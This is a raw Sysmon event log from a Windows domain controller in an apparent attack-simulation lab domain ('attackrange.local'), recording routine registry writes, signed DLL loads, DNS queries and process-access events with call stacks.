13:10:15.539{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{1CB43B2C-C86A-4E06-B290-4CC7148155AC}\DateLastConnectedBinary Data 13241300x80000000000000002751Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:15.539{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{1CB43B2C-C86A-4E06-B290-4CC7148155AC}\NameTypeDWORD (0x00000006) 13241300x80000000000000002750Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:15.539{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{1CB43B2C-C86A-4E06-B290-4CC7148155AC}\DateCreatedBinary Data 13241300x80000000000000002749Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:15.539{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{1CB43B2C-C86A-4E06-B290-4CC7148155AC}\CategoryDWORD (0x00000002) 13241300x80000000000000002748Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:15.539{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{1CB43B2C-C86A-4E06-B290-4CC7148155AC}\ManagedDWORD (0x00000001) 13241300x80000000000000002747Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:15.539{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{1CB43B2C-C86A-4E06-B290-4CC7148155AC}\Descriptionattackrange.local 13241300x80000000000000002746Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:15.539{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{1CB43B2C-C86A-4E06-B290-4CC7148155AC}\ProfileNameattackrange.local 734700x80000000000000002745Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.461{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\System32\svchost.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 13241300x80000000000000002744Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:15.367{08A6967A-4288-6000-1200-000000009A01}1232C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\{b4aceb91-3521-4f28-a5f8-434384469e9a}\Dhcpv6StateDWORD (0x00000001) 13241300x80000000000000002743Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:15.367{08A6967A-4288-6000-1200-000000009A01}1232C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\{b4aceb91-3521-4f28-a5f8-434384469e9a}\Dhcpv6StateDWORD (0x00000000) 13241300x80000000000000002742Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:15.352{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\Netlogon\Private\IPV6SocketAddressListBinary Data 13241300x80000000000000002741Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:15.305{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\tunnel\Enum\NextInstanceDWORD (0x00000002) 13241300x80000000000000002740Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:15.305{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\tunnel\Enum\CountDWORD (0x00000002) 13241300x80000000000000002739Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:15.305{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\tunnel\Enum\1SWD\IP_TUNNEL_VBUS\Teredo_Tunnel_Device 734700x80000000000000002738Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.289{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\System32\svchost.exeC:\Windows\System32\NetSetupSvc.dll10.0.14393.3503 (rs1_release.200131-0410)Network Setup ServiceMicrosoft® Windows® Operating SystemMicrosoft CorporationNETSETUPSVC.DLLMD5=4B455FA2A15BE4C278D0D655A7EA9543,SHA256=1C04ABE14400CC4175704B08D008454820BBF14BFECE1934A82756A6037E681B,IMPHASH=14F8BB5E943EA23F79CC3EC6B8C493FBtrueMicrosoft WindowsValid 13241300x80000000000000002813Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:16.758{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch2\EpochDWORD (0x00000366) 22542200x80000000000000002812Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.579{08A6967A-4288-6000-1000-000000009A01}1136isatap.eu-central-1.compute.internal9003-C:\Windows\System32\svchost.exe 22542200x80000000000000002811Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.543{08A6967A-4288-6000-1500-000000009A01}1324eu-central-1.compute.internal1460-C:\Windows\System32\svchost.exe 22542200x80000000000000002810Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.543{08A6967A-4288-6000-1000-000000009A01}1136win-dc-250.attackrange.local0fe80::3094:32e1:f5ff:fef1;fe80::1c24:42de:efae:dae3;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000002809Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.543{08A6967A-4288-6000-1500-000000009A01}1324iajktank1460-C:\Windows\System32\svchost.exe 22542200x80000000000000002808Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.437{08A6967A-4288-6000-1500-000000009A01}1324win-dc-250.attackrange.local0fe80::3094:32e1:f5ff:fef1;fe80::1c24:42de:efae:dae3;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000002807Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.395{08A6967A-4286-6000-0B00-000000009A01}852_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.0type: 33 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002806Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.381{08A6967A-4288-6000-1200-000000009A01}1232win-dc-250.attackrange.local0fe80::3094:32e1:f5ff:fef1;fe80::1c24:42de:efae:dae3;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000002805Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.369{08A6967A-4298-6000-2B00-000000009A01}2680WIN-DC-2500fe80::3094:32e1:f5ff:fef1;fe80::1c24:42de:efae:dae3;C:\Windows\System32\spoolsv.exe 22542200x80000000000000002804Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.263{08A6967A-4288-6000-1000-000000009A01}1136win10.ipv6.microsoft.com.0type: 5 onpremwindows.ipv6.microsoft.com.akadns.net;type: 5 trdovmssukwest.ipv6.microsoft.com.akadns.net;40.81.120.44;C:\Windows\System32\svchost.exe 10341000x80000000000000002803Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.992{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1700-000000009A01}1744C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002802Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.992{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x80000000000000002818Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:16.227{08A6967A-4288-6000-1500-000000009A01}1324win-dc-2501460-C:\Windows\System32\svchost.exe 22542200x80000000000000002817Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.788{08A6967A-4288-6000-1000-000000009A01}1136win-dc-250.attackrange.local0fe80::3094:32e1:f5ff:fef1;2001:0:2851:782c:3094:32e1:f5ff:fef1;fe80::1c24:42de:efae:dae3;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000002816Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.783{08A6967A-4288-6000-1100-000000009A01}1192wpad9003-C:\Windows\System32\svchost.exe 22542200x80000000000000002815Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.783{08A6967A-4286-6000-0B00-000000009A01}852win-dc-250.attackrange.local0fe80::3094:32e1:f5ff:fef1;2001:0:2851:782c:3094:32e1:f5ff:fef1;fe80::1c24:42de:efae:dae3;::ffff:10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002814Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.746{08A6967A-4298-6000-2B00-000000009A01}2680WIN-DC-2500fe80::3094:32e1:f5ff:fef1;2001:0:2851:782c:3094:32e1:f5ff:fef1;fe80::1c24:42de:efae:dae3;C:\Windows\System32\spoolsv.exe 22542200x80000000000000002844Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:18.413{08A6967A-4288-6000-1500-000000009A01}1324attackrange.local0type: 2 win-dc-250.attackrange.local;10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000002843Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:18.409{08A6967A-4298-6000-3500-000000009A01}2988win-dc-250.attackrange.local0fe80::3094:32e1:f5ff:fef1;2001:0:2851:782c:3094:32e1:f5ff:fef1;fe80::1c24:42de:efae:dae3;::ffff:10.0.1.14;C:\Windows\System32\dns.exe 22542200x80000000000000002842Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:18.402{08A6967A-4288-6000-1500-000000009A01}1324win-dc-250.attackrange.local9501type: 6 ;10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000002841Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:18.030{08A6967A-4298-6000-2E00-000000009A01}2808sv.symcd.com0type: 5 ocsp-ds.ws.symantec.com.edgekey.net;type: 5 e8218.dscb1.akamaiedge.net;::ffff:23.37.43.27;C:\Windows\sysmon64.exe 22542200x80000000000000002840Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:18.019{08A6967A-4298-6000-2E00-000000009A01}2808s2.symcb.com0type: 5 ocsp-ds.ws.symantec.com.edgekey.net;type: 5 e8218.dscb1.akamaiedge.net;::ffff:23.37.43.27;C:\Windows\sysmon64.exe 22542200x80000000000000002839Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:18.005{08A6967A-4298-6000-2E00-000000009A01}2808sv.symcb.com0type: 5 crl-symcprod.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:93.184.220.29;C:\Windows\sysmon64.exe 22542200x80000000000000002838Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:16.440{08A6967A-4298-6000-2E00-000000009A01}2808pki.intel.com0type: 5 certificates.intel.com.edgesuite.net;type: 5 a243.d.akamai.net;::ffff:2.16.177.88;::ffff:2.16.177.16;C:\Windows\sysmon64.exe 22542200x80000000000000002837Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:16.317{08A6967A-4298-6000-2E00-000000009A01}2808ocsp.intel.com0type: 5 ocsp.comodoca.com;::ffff:151.139.128.14;C:\Windows\sysmon64.exe 13241300x80000000000000002836Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:18.555{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\Teredo\CollectionBinary Data 13241300x80000000000000002835Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:18.555{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\Teredo\CollectionBinary Data 13241300x80000000000000002834Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:18.555{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\Netlogon\Private\IPV6SocketAddressListBinary Data 13241300x80000000000000002833Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:18.555{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\Netlogon\Private\IPV6SocketAddressListBinary Data 13241300x80000000000000002832Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:18.398{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 13241300x80000000000000002831Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:18.398{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\StaleAdapterDWORD (0x00000000) 13241300x80000000000000002830Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:18.398{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\CompartmentIdDWORD (0x00000001) 13241300x80000000000000002829Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:18.398{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\FlagsDWORD (0x00000002) 13241300x80000000000000002828Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:18.398{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\TtlDWORD (0x000004b0) 13241300x80000000000000002827Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:18.398{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentPriUpdateToIpBinary Data 13241300x80000000000000002826Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:18.398{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentUpdateToIpBinary Data 13241300x80000000000000002825Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:18.398{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\DnsServersBinary Data 13241300x80000000000000002824Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:18.398{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\HostAddrsBinary Data 13241300x80000000000000002823Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:18.398{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\PrimaryDomainNameattackrange.local 13241300x80000000000000002822Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:18.398{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\AdapterDomainName(Empty) 13241300x80000000000000002821Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:18.398{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\Hostnamewin-dc-250 10341000x80000000000000002820Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:18.398{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 13241300x80000000000000002819Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:18.398{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 13241300x80000000000000002845Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:19.570{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch2\EpochDWORD (0x00000367) 10341000x80000000000000002846Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:20.289{08A6967A-4288-6000-1500-000000009A01}13241688C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002888Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:21.976{08A6967A-42BD-6000-8700-000000009A01}47924812C:\Windows\system32\conhost.exe{08A6967A-42BD-6000-8600-000000009A01}4780C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002887Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:21.945{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-42BD-6000-8700-000000009A01}4792C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002886Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:21.914{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002885Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:21.914{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002884Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:21.914{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002883Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 